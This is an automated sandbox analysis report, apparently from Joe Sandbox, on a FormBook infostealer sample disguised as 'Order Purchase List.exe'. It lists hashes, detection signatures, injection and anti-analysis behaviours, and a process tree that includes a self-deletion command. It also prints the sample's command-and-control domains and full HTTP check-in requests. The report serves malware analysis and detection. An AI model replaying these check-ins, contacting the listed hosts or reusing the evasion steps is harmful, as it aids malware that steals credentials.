Windows Analysis Report Order Purchase List.exe

Overview

General Information

Sample Name: Order Purchase List.exe
Analysis ID: 499414
MD5: 903febb63c1a5afa29741401eac430af
SHA1: 3b6d8067630bc891b469ad5d367880e602aaa6a8
SHA256: 4a32f26bf573c5407014a41c8c54f84afa0041cce8c2b65f147527608cb23598

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Order Purchase List.exe (PID: 4524 cmdline: 'C:\Users\user\Desktop\Order Purchase List.exe' MD5: 903FEBB63C1A5AFA29741401EAC430AF)
    • Order Purchase List.exe (PID: 5344 cmdline: {path} MD5: 903FEBB63C1A5AFA29741401EAC430AF)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4856 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 388 cmdline: /c del 'C:\Users\user\Desktop\Order Purchase List.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      10.2.Order Purchase List.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      10.2.Order Purchase List.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      10.2.Order Purchase List.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      10.2.Order Purchase List.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      10.2.Order Purchase List.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Order Purchase List.exe, Virustotal: Detection: 34%
          Source: Order Purchase List.exe, Metadefender: Detection: 40%
          Source: Order Purchase List.exe, ReversingLabs: Detection: 67%
          Yara detected FormBook
          Source: Yara match, File source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.hottorchlighter.com/gnui/, Avira URL Cloud: Label: malware
          Source: http://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_, Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Order Purchase List.exe, Joe Sandbox ML: detected
          Source: 10.2.Order Purchase List.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Order Purchase List.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Order Purchase List.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000013.00000003.395986362.00000000004F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 4x nop then pop esi, 10_2_00415852
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 4x nop then pop edi, 10_2_004162ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 19_2_02B062ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 19_2_02B05852

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49829 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49830 -> 68.178.221.206:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 154.23.204.56 80
          Source: C:\Windows\explorer.exe, Domain query: www.hottorchlighter.com
          Source: C:\Windows\explorer.exe, Domain query: www.auxiliacapitalpartnersllc.com
          Source: C:\Windows\explorer.exe, Domain query: www.bigbigsea.com
          Source: C:\Windows\explorer.exe, Domain query: www.inatividigitali.com
          Source: C:\Windows\explorer.exe, Network Connect: 104.21.44.253 80
          Source: C:\Windows\explorer.exe, Network Connect: 68.178.221.206 80
          Source: C:\Windows\explorer.exe, Domain query: www.greatamericanlandworks.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Uses netstat to query active network connections and open ports
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.hottorchlighter.com/gnui/
          Source: Joe Sandbox View, ASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected: GET /gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ HTTP/1.1 Host: www.inatividigitali.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ HTTP/1.1 Host: www.auxiliacapitalpartnersllc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ HTTP/1.1 Host: www.hottorchlighter.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ HTTP/1.1 Host: www.bigbigsea.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 08 Oct 2021 09:24:18 GMT Content-Type: text/html Content-Length: 275 ETag: "615f93b1-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 08 Oct 2021 09:24:34 GMT Content-Type: text/html Content-Length: 146 Connection: close Set-Cookie: security_session_verify=b916c671982bbc4ddcef9e4fa11e215e; expires=Mon, 11-Oct-21 17:24:34 GMT; path=/; HttpOnly Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: unknown, DNS traffic detected: queries for: www.inatividigitali.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample, Static PE information: Filename: Order Purchase List.exe
          Source: Order Purchase List.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 02E6B150 appears 35 times
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004185F0 NtCreateFile, 10_2_004185F0
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004186A0 NtReadFile, 10_2_004186A0
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_00418720 NtClose, 10_2_00418720
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004187D0 NtAllocateVirtualMemory, 10_2_004187D0
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004185EA NtCreateFile, 10_2_004185EA
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_0041871A NtClose, 10_2_0041871A
          Source: C:\Users\user\Desktop\Order Purchase List.exe, Code function: 10_2_004187CA NtAllocateVirtualMemory, 10_2_004187CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9A50 NtCreateFile, LdrInitializeThunk, 19_2_02EA9A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9860 NtQuerySystemInformation, LdrInitializeThunk, 19_2_02EA9860
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9840 NtDelayExecution, LdrInitializeThunk, 19_2_02EA9840
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA99A0 NtCreateSection, LdrInitializeThunk, 19_2_02EA99A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 19_2_02EA9910
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA96E0 NtFreeVirtualMemory, LdrInitializeThunk, 19_2_02EA96E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA96D0 NtCreateKey, LdrInitializeThunk, 19_2_02EA96D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9660 NtAllocateVirtualMemory, LdrInitializeThunk, 19_2_02EA9660
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9650 NtQueryValueKey, LdrInitializeThunk, 19_2_02EA9650
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9FE0 NtCreateMutant, LdrInitializeThunk, 19_2_02EA9FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9780 NtMapViewOfSection, LdrInitializeThunk, 19_2_02EA9780
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9710 NtQueryInformationToken, LdrInitializeThunk, 19_2_02EA9710
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA95D0 NtClose, LdrInitializeThunk, 19_2_02EA95D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9540 NtReadFile, LdrInitializeThunk, 19_2_02EA9540
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9A80 NtOpenDirectoryObject, 19_2_02EA9A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9A20 NtResumeThread, 19_2_02EA9A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9A00 NtProtectVirtualMemory, 19_2_02EA9A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9A10 NtQuerySection, 19_2_02EA9A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EAA3B0 NtGetContextThread, 19_2_02EAA3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9B00 NtSetValueKey, 19_2_02EA9B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA98F0 NtReadVirtualMemory, 19_2_02EA98F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA98A0 NtWriteVirtualMemory, 19_2_02EA98A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EAB040 NtSuspendThread, 19_2_02EAB040
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9820 NtEnumerateKey, 19_2_02EA9820
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA99D0 NtCreateProcessEx, 19_2_02EA99D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9950 NtQueueApcThread, 19_2_02EA9950
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9670 NtQueryInformationProcess, 19_2_02EA9670
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9610 NtEnumerateValueKey, 19_2_02EA9610
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA97A0 NtUnmapViewOfSection, 19_2_02EA97A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9760 NtOpenProcess, 19_2_02EA9760
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EAA770 NtOpenThread, 19_2_02EAA770
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9770 NtSetInformationFile, 19_2_02EA9770
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9730 NtQueryVirtualMemory, 19_2_02EA9730
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EAA710 NtOpenProcessToken, 19_2_02EAA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA95F0 NtQueryInformationFile, 19_2_02EA95F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9560 NtWriteFile, 19_2_02EA9560
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EA9520 NtWaitForSingleObject, 19_2_02EA9520
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02EAAD30 NtSetContextThread, 19_2_02EAAD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B086A0 NtReadFile, 19_2_02B086A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B087D0 NtAllocateVirtualMemory, 19_2_02B087D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B08720 NtClose, 19_2_02B08720
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B085F0 NtCreateFile, 19_2_02B085F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B087CA NtAllocateVirtualMemory, 19_2_02B087CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B0871A NtClose, 19_2_02B0871A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 19_2_02B085EA NtCreateFile, 19_2_02B085EA
          Source: Order Purchase List.exe, 00000000.00000000.270770185.00000000010C0000.00000002.00020000.sdmp, Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe
